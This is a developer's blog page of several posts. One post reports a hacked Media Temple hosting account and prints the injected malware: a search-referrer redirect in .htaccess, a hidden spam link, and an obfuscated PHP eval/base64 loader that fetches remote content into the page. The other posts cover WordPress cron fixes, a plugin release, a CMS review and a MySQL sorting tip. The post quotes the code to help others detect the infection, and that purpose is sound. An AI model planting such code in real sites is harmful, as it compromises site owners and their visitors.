JeffreyBarke.net

Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a MediaTemple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.

While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]

I immediately knew that this install of WordPress had been comprised, but, prior to deleting the lines, I decided to Google them to find out more information about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.

It appears that this exploit is targeted at Media Temple's (gs) account and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected. All of them were on my (gs) account, including a domain that had Flyspray installed, but not WordPress.

All of the infected domains had the above code in the root .htaccess as well the following code in the root index.php:

<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.

This exploit has affected people running up to at least version 2.85 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out.

I'm not sure why it never happened before; I guess I never tried to schedule a post in WordPress (since 2.7, anyway) on a Media Temple (dv) server (even though most of our clients are on Media Temple and many of them use WordPress!). Regardless, it was happening now—the infamous "missed schedule" problem.

Initially, I thought the problem was due to our staging server being secured by basic authentication. I removed it, but the problem persisted. Then I turned to the WordPress forums, but to no avail. The best answer was that it was a server configuration problem (every other suggestion seemed like a snake oil remedy). However, knowing that it was a server configuration problem didn't really help, since I had no idea what the server configuration issue was or how to resolve it.

It turns out the answer was simple and only one Google query away:

… Media Temple's (dv) configuration was responsible for the "Missed schedule" errors I was getting in Wordpress.By default, the /etc/hosts file looks like this:

127.0.0.1 yourdomain.com yourdomain localhost localhost.localdomain

To execute cron tasks, Wordpress needs to post to the URL http://yourdomain.com/wp-cron.php?doing_wp_cron. This isn't usually a problem, but with the above hosts file and Plesk's Apache configuration, that URL will actually result in a 404 error.

To resolve this, SSH into your (dv) server and run the following commands:

vi /etc/hosts
Press I to enter insert mode
Change the hosts file to read:
127.0.0.1 localhost localhost.localdomain
xxx.xxx.xxx.xxx yourdomain.com yourdomain
Press ESC to exit insert mode and :wq to save your changes and exit.

That's it! There's no need to restart the server. Note—This is not necessary on Media Temple's (gs) service. Scheduling should work fine there.

I just posted a quick guide on working with Subversion via SvnX on Mac OS X to theMechanism's blog in anticipation of tomorrow night's New York Web Standards Meetup presentation on Small Web Team Collaboration with Subversion by Scott Trudeau.

Adhesive 3.4.0, a WordPress plugin that allows one to easily mark posts "sticky," is now released. Sticky posts always appear at the top of the page when several posts are displayed.

The most important changes to Adhesive in version 3.4.0 are:

• Compatibility with WordPress 2.6.5.
• No longer breaks the native paging functionality in WordPress.
• Removes all Adhesive-added rows to the wp_postmeta table on plugin deactivation
• All configuration options and the admin panel menu have been removed. Adhesive simply makes posts sticky—there's really nothing to configure.
• Solo file functionality has been removed

Get Adhesive 3.4.0.

CushyCMS is a hosted CMS that works with existing sites and seems like a perfect solution for freelancers, budget-conscious clients and brochureware. It's free, very easy to use and administer and has a cute user interface. All you need to get started is your own web host and FTP credentials.

Creating a new CushyCMS account is easy and takes less than a minute. It only requires a name, email and password. There is no email verification process to endure—the account is created and activated immediately.

Once the account is created, you add a "new" site by supplying its FTP information. Then you "assign" pages to the site by specifying paths to existing files. If this step sounds complicated, let me assure you it's not. The user interface is so well-designed that even Web novices should have no problem with this.

After assigning a page to a site, clicking its title will bring up the CushyCMS editor. All areas previously marked up on the page with the class name cushycms will appear as editable regions. Headings appear as single lines, images have an uploader and other elements have full visual editors.

Collaboration is made possible by adding other users (known as "editors") to the account. These users can be granted editing rights on a per-site and per-page basis.

CushyCMS's simplicity will definitely appeal to certain clients and makes sense for certain types of websites. The price (you can't beat free) is definitely suitable for low-budget projects, and the fact that the system requires no programming knowledge will make it useful for freelancers and designers who know HTML and CSS, but no programming languages. The deployment time? Negligible.

However, CushyCMS definitely has limitations as a CMS. There's no way to add new pages, to preview work prior to publishing, or to require approval prior to another user publishing their work. Since CushyCMS is not database-driven, there are no "template" functions and no way to dynamically derive certain types of information (such as navigation or a sitemap).

Bottom line: CushyCMS is a very cool, but very limited product. It definitely has its uses, but its strengths and weaknesses should be understood and evaluated in terms of a client's needs and expectations. If they match, I definitely recommend it. If not, I suggest WordPress or Drupal.

For those who pay attention to this sort of thing: CushyCMS is powered on the client-side by Prototype, script.aculo.us, Lightbox and FCKeditor.

I was asked to sort a table of lease data by floor in descending order today—simple, right? But after updating the query with ORDER BY floor DESC, I noticed the results were wrong. The 9^th floor was always at the top and the 10^th floor and above were between the second and first floors.

It was immediately obvious—the floor field was not stored as numeric data, but as character data. This struck me as odd, so I investigated the DB structure and values. The floor field was definitely being stored as character data, but why? The reason: the client wanted to store certain floors as LL.

So given this structure, how could I quickly and easily sort the floors? The answer: MySQL's CAST function. By casting the floor field as an integer, the numeric floors would sort correctly. Even better, the character data LL would cast to 0, preserving a correct sort.

I updated the query with ORDER BY CAST(floor as UNSIGNED) DESC and obtained the desired results. Learn more about MySQL's cast functions and operators.

Cali Lewis and Neal Campbell of GeekBrief.TV talk about GeekBrief.TV, podcasting, Ustream.tv and WordPress during WordCamp Dallas 2008.

Source: One Man's Blog

Photos and videos from the 2008 WordCamp NY are now available at firesidemedia.net/dev/wordcamp-ny-2008-photos-videos/.

Part one of Matt Mullenweg's keynote address to WordCamp NY 2008:

At http://members.shaw.ca/nicholas.fong/dig/, you can download Windows 2000, XP and Vista binaries for dig and WHOIS. The page also includes installation instructions and examples of how to query the DNS with dig.

WordPress 2.6.1 was released yesterday. This is a maintenance release only, and, if you're happy using 2.6, you can continue to use it.

• Learn more
• Full list of over 60 fixes
• Full diff and list of changed
• Download 2.6.1